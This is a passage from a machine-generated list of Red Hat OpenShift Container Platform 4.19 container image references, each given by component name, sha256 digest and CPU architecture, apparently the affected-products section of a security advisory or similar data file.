"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
